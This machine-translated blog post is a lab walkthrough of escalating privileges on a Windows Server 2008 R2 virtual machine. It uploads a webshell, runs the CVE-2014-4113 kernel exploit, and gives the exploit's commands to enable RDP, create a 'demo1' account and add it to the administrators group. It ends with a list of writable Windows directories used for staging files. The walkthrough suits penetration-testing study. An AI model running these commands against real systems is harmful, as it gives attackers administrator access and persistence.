当前位置:网站首页>111. Network security penetration test - [privilege escalation 9] - [windows 2008 R2 kernel overflow privilege escalation]
111. Network security penetration test - [privilege escalation 9] - [windows 2008 R2 kernel overflow privilege escalation]
2022-07-07 12:03:00 【qwsn】
In my submission , Whether studying safety or engaging in safety , More or less, I have some feelings and sense of mission !!!
List of articles
One 、Windows Kernel overflow rights [2008]
1、 Background of kernel overflow rights :
stay winserver2008 R2 in , By default, the server supports aspx Of . So by default, you can execute some commands . If there is no patch, you can use some overflow rights raising tools , Right to raise .
2、CVE-2014-4113-Exploit
This version of the rights raising tool , It can be done to winserver2008 The system carries out overflow and right lifting
3、 Kernel overflow authorization process :
(1) Experimental environment :
1. Target environment :
(1) virtual machine Windows2008【target_sys.com】【192.168.97.131】
(2) Scripting language environment :php/asp The language environment exists
2. attack :
(1) virtual machine Win7【192.168.97.130】
(2)Firefox+Burpsuite+ Ant sword + Malaysia
3. The network environment :
(1)VMware Built NAT The Internet
(2) Target link :
URL:http://target_sys.com/upload.php
(3) Experimental process :
First step : Visit the target link , utilize MIME Break through the type limit of the white list , Upload up.aspx Malaysia
【 The above process is a little 】 The following is the right raising process :
The second step : Connect up.aspx Malaysia 【 The password for admin】, And click the [CmdShell] modular , call cmd.exe perform whoami command , View current user information , Discovery permissions are low
stay winserver2008 R2 in , By default, the server supports aspx Of . So by default, you can execute some commands :
The third step : Click on [CmdShell] modular , call cmd.exe perform systeminfo command , Copy the results , And then use it wes.py Script scanning vulnerability , But it didn't come out
Scan results : Scan fail
Step four : hold systeminfo Put your information into In this website , Retrieve relevant rights exp, Finally found CVE-2014-4113 Right can be raised . At the same time, we go through msfconsole, type search kernel
You can also retrieve some exp, Enter one by one and then type info, Found some are 2008R2 The right to raise exp, Image below ms14-058 It's corresponding to CVE-2014-4113.
Step five : Click on [File Manager] File management module , Upload rw.aspx Used to scan readable and writable folders
Step six : Visit the just uploaded rw.aspx Malaysia , Scan readable and writable folders
As shown in the figure below , We scanned some readable and writable folders , After incomplete testing , It is found that the root directory of the website can be used .
Step seven : Back to Malaysia just now , Upload CVE-2014-4113-Exploit Of exp To c:\inetpub\wwwroot\target_sys.com Next
Step eight : Click on [CmdShell] modular , call cmd Execute the just passed cve-2017-4113 Of exp, As shown below , Successful overflow
Step nine : Execute the following commands in turn , Turn on 3389 port , Add administrator group users demo1, Finally, connect the target remotely .
/c c:\inetpub\wwwroot\target_sys.com\Win64.exe "netstat -ano"
# View port status /c c:\inetpub\wwwroot\target_sys.com\Win64.exe "REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal\" \"Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f"
# Turn on 3389/c c:\inetpub\wwwroot\target_sys.com\Win64.exe "netstat -ano"
# Verify that it is on 3389
/c c:\inetpub\wwwroot\target_sys.com\Win64.exe "net user demo1 123 /add"
# Add users demo1/213/c c:\inetpub\wwwroot\target_sys.com\Win64.exe "net localgroup administrators demo1 /add"
# hold demo1 Users join the administrators group
/c c:\inetpub\wwwroot\target_sys.com\Win64.exe "net user"
# verification demo1 Does the user exist
mstsc Remote Desktop Connection :
attach : Common read / write directories
≤2003 Read write table of contents
C:\RECYCLER\
D:\RECYCLER\
E:\RECYCLER\
C:\Windows\temp\
C:\Windows\Debug\
C:\Windows\Registration\CRMLog\
C:\Documents and Settings\All Users\Documents\
≥2008 Read write table of contents
C:\ProgramData\
C:\Windows\temp\
C:\Windows\Tasks\
C:\Windows\tracing\ // It can't be deleted
C:\Windows\debug\WIA\
C:\Windows\servicing\Sessions\
C:\Windows\servicing\Packages\
C:\Windows\Registration\CRMLog\
C:\Windows\System32\spool\drivers\color\
C:\Users\Default\AppData\ // It can't be deleted
C:\ProgramData\Microsoft\DeviceSync\
C:\ProgramData\Microsoft\Crypto\DSS\MachineKeys\
C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\
C:\ProgramData\Microsoft\User Account Pictures\ // It can't be deleted
C:\Users\All Users\Microsoft\NetFramework\BreadcrumbStore\ // It can't be deleted
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys\
C:\Windows\syswow64\tasks\microsoft\Windows\pla\system\
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Temporary ASP.NET Files\
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Temporary ASP.NET Files\
C:\Windows\System32\catroot2\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\
C:\Windows\System32\catroot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\
边栏推荐
- 源代码防泄密中的技术区别再哪里
- The road to success in R & D efficiency of 1000 person Internet companies
- 通过环境变量将 Pod 信息呈现给容器
- Fleet tutorial 15 introduction to GridView Basics (tutorial includes source code)
- SwiftUI Swift 内功之如何在 Swift 中进行自动三角函数计算
- HCIA复习整理
- Ask about the version of flinkcdc2.2.0, which supports concurrency. Does this concurrency mean Multiple Parallelism? Now I find that mysqlcdc is full
- Suggestions on one-stop development of testing life
- [texture feature extraction] LBP image texture feature extraction based on MATLAB local binary mode [including Matlab source code 1931]
- Onedns helps college industry network security
猜你喜欢
相机标定(1): 单目相机标定及张正友标定基本原理
110. Network security penetration test - [privilege promotion 8] - [windows sqlserver xp_cmdshell stored procedure authorization]
SwiftUI Swift 内功之如何在 Swift 中进行自动三角函数计算
清华姚班程序员,网上征婚被骂?
[extraction des caractéristiques de texture] extraction des caractéristiques de texture de l'image LBP basée sur le mode binaire local de Matlab [y compris le code source de Matlab 1931]
Fleet tutorial 15 introduction to GridView Basics (tutorial includes source code)
There are so many factors that imprison you
[filter tracking] strapdown inertial navigation pure inertial navigation solution matlab implementation
Explore cloud database of cloud services together
Problem: the string and characters are typed successively, and the results conflict
随机推荐
通过环境变量将 Pod 信息呈现给容器
Swiftui swift internal skill: five skills of using opaque type in swift
CMU15445 (Fall 2019) 之 Project#2 - Hash Table 详解
Flet教程之 18 Divider 分隔符组件 基础入门(教程含源码)
Steps of redis installation and self startup configuration under CentOS system
Test the foundation of development, and teach you to prepare for a fully functional web platform environment
Review and arrangement of HCIA
[system design] index monitoring and alarm system
108. Network security penetration test - [privilege escalation 6] - [windows kernel overflow privilege escalation]
STM32F1与STM32CubeIDE编程实例-MAX7219驱动8位7段数码管(基于SPI)
正在运行的Kubernetes集群想要调整Pod的网段地址
Easyui学习整理笔记
Cmu15445 (fall 2019) project 2 - hash table details
In my limited software testing experience, a full-time summary of automation testing experience
【最短路】ACwing 1127. 香甜的黄油(堆优化的dijsktra或spfa)
108.网络安全渗透测试—[权限提升篇6]—[Windows内核溢出提权]
小红书微服务框架及治理等云原生业务架构演进案例
@Bean与@Component用在同一个类上,会怎么样?
Mastering the new functions of swiftui 4 weatherkit and swift charts
Superscalar processor design yaoyongbin Chapter 9 instruction execution excerpt